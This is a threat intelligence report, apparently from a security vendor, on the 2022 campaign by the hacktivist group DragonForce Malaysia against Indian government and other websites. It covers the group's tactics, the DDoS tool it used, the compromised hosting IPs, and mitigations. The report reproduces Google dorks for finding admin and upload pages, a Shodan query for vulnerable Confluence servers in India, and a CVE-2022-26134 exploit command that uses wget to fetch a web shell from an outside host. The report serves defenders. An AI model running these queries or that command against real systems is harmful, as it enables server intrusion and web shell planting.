Techniques, Tactics & Procedures (TTPs) Employed by Hacktivist Group DragonForce Malaysia

Summary

DragonForce has been actively targeting Indian entities under #OpsPatuk and #OpsIndia. Breach of some sensitive Government websites containing PII, military operations, and other government secrets.
 
Category: Adversary Intelligence Industry: Multiple Motivation: Hacktivism Country: India

Executive Summary

THREAT IMPACT MITIGATION
  • DragonForce has been actively targeting Indian entities under #OpsPatuk and #OpsIndia.
  • Threat actor groups from Pakistan, Turkey, and Palestine have joined the campaign.
  • Breach of some sensitive Government websites containing PII, military operations, and other government secrets.
  • Implement Anti-DDoS technologies
  • Utilize specially designed network equipment.
  • Internet hosting providers and Government Cyber Response Teams to be on high alert.

Analysis & Attribution

Information from Social Media

  • On 10 June 2022, CloudSEK’s contextual AI digital risk platform XVigil discovered a Tweet posted by the Malaysian hacktivist group, DragonForce, calling for attacks on Indian Government websites by Muslim hackers all around the world.
  • The group’s primary objective of the attack was to get back at the Indian Government for controversial comments on Prophet Muhammad by some Indian politicians.
  • Since then, the group and its supporters have compromised more than 3,000 government and non-government organizations, military websites, and private entities.
  • The compromised entities include BJP (the ruling party of India), Army veteran websites, academic institutes, etc.

About their Servers

  • The group uses two DNS servers, “annabel.ns.cloudflare.com” and “nicolas.ns.cloudflare.com” with 104.21.35.227, and 172.67.180.87 being the IP addresses of the servers respectively.
  • It was discovered that the DragonForce domain was hosted along with multiple Russian, Australian, Chinese, and other websites alongside multiple adult domains.

Techniques, Tactics, & Procedures (TTPs)

The three primary attack vectors used by the group and its supporters are as follows and as expressed in the flow diagram:
  • Google Dorking
  • Shodan Dorks
  • DDoS Attacks
Flow diagram illustrating an overview of the TTP employed by the DragonForce group and its partners
Flow diagram illustrating an overview of the TTP employed by the DragonForce group and its partners
 

Google Dorks

  • Google Dorks are the primary source of the group's targets, which is confirmed from the following image of a Tiktok video made by one of DragonForce's allies:
Image from a PoC video of a partner of DragonForce revealing Google Dorks in search
Image from a PoC video of a partner of DragonForce revealing Google Dorks in search
 
  • The Google Dorks list included dorks for finding various educational institutions, wherein dorks relating to academic and campus logins were found.
  • The full list contains around 360 google dorks which could have been abused for numerous malicious purposes. A few significant dorks from the list are mentioned:
Google Dorks
inurl:/admin/upload/ : Ministry of Knowledge & Resource sharing inurl: /login/login.php admin: For Admin logins into websites using PHP language
“allowed file types: png gif jpg txt site:gov.in” : Google dork to upload shell html files into the server php?id= site:in: Indian sites with ID parameter that can be abused and URL manipulation could be performed
inurl/mnux = campus login : Academic institutions with Campus login parameter inurl/mnux = academic login : Academic institutions with Academic login parameter
inurl/mnux = administrative academic login : Academic institutions with Administrative academic login parameter inurl: /admin/cp.php : Reveals all sites with Control panel which can provide access to the server.
inurl:admin/upload.php : For sites with upload feature that actors could exploit for shell using script deface

Shodan Dorks and Atlassian Confluence Vulnerability

  • A PoC was shared for the exploit of the Atlassian Confluence vulnerability along with the Shodan dork for Confluence Server vulnerabilities targeted towards the Indian region.
Shodan Dork: http.favicon.hash:-305179312 country:"IN"
  • The actor also shared a GitHub repository script which can be downloaded and exploited using the following python command:
CVE-2022-26134.py http://targets.com “wget https://site.com/shell.txt -O DFM.php

DDoS Attacks (HTTP Flooding)

  • The group invited its members and other users on the forum to conduct the DDoS attack where they shared an infographic stating the website, IP addresses, and the port of the target.
Infographic shared by DragonForce group for OpsIndia/OpsPatuk
Infographic shared by DragonForce group for OpsIndia/OpsPatuk
 
  • The group used a tool called HTTPFLOOD (aka “./404FOUND.MY”), which manipulates and posts unwanted requests to bring down a web server or application. The tool has been built in Python language and it takes the following three inputs:
    • A target URL
    • A Proxy list
    • Number of threads (i.e count of requests to be sent to the server)
  • Further analysis found that the user 'SKYSG404' built the HTTPFLOOD tool, and that both the tool and the Github account hosting it were created on 12 June 2022.
Screenshot of the Github account hosting HTTPFLOOD(./404found.my)
Screenshot of the Github account hosting HTTPFLOOD(./404found.my)

Compromising Servers

  • It was observed that a large number of domains being targeted, resolved to a common IP where they were hosted.
  • The attackers appeared to have gained access to the server via an injection vulnerability on one of the websites.
  • Once a server is compromised, all the websites hosted on it easily fall prey to the attackers, as seen in the pie chart below.
Pie chart depicting common IP being shared by multiple Domain names
Pie chart depicting common IP being shared by multiple Domain names
 
  • As witnessed in the table given below, almost 61% of the domains compromised belonged to E2ENetworks.in which is based in Delhi, India.
  • Another major chunk, 20.8%, of hacked domains belonged to Atria Convergence Technologies Pvt. Ltd.
  • Jointly, both of these ISPs constitute around 81% of the compromised websites.

Share of Domain names resolving to common IP and ISP Information

IP Percentage Location Name of ISP
164.52.212.58 40.1 Saidabad, New Delhi, India E2ENetworks.in
216.48.179.60 20.8 Saidabad, New Delhi, India E2ENetworks.in
183.83.180.226 20.8   Lucknow, Uttar Pradesh, India Atria Convergence Technologies pvt ltd
120.138.4.218 8.2 Valsad, Gujarat, India SHREENET
103.115.194.39 4.8 Mumbai, India Netmagic Datacenter Mumbai

Impact & Mitigation

Impact Mitigation
  • Escalation of such campaigns on a global level can lead to atrocious consequences for the Indian government and entities.
  • Exposed data would equip malicious actors with details required to launch sophisticated attacks.
  • Attacks on defense infrastructure can lead to sensitive information being compromised and cause a national security issue.
  • Patch vulnerable and exploitable endpoints.
  • Monitor for anomalies in user accounts and internet-exposed web applications, indicating possible account takeovers.
  • Scan repositories to identify exposed credentials and secrets.
  • Monitor cybercrime forums for the latest tactics employed by threat actors.

References

Appendix

Mumbai University’s website server was down in the aftermath of the DDOS attack
Mumbai University’s website server was down in the aftermath of the DDOS attack
 
Infographic shared by DragonForce group for OpsIsrael/OpsBedil
Infographic shared by DragonForce group for OpsIsrael/OpsBedil
   
annabel.ns.cloudflare.com DNS server with 2110 hosted domains.
annabel.ns.cloudflare.com DNS server with 2110 hosted domains.
 
nicolas.ns.cloudflare.com DNS server with 3909 hosted domains.
nicolas.ns.cloudflare.com DNS server with 3909 hosted domains.
 

Table of Contents

Request an easy and customized demo for free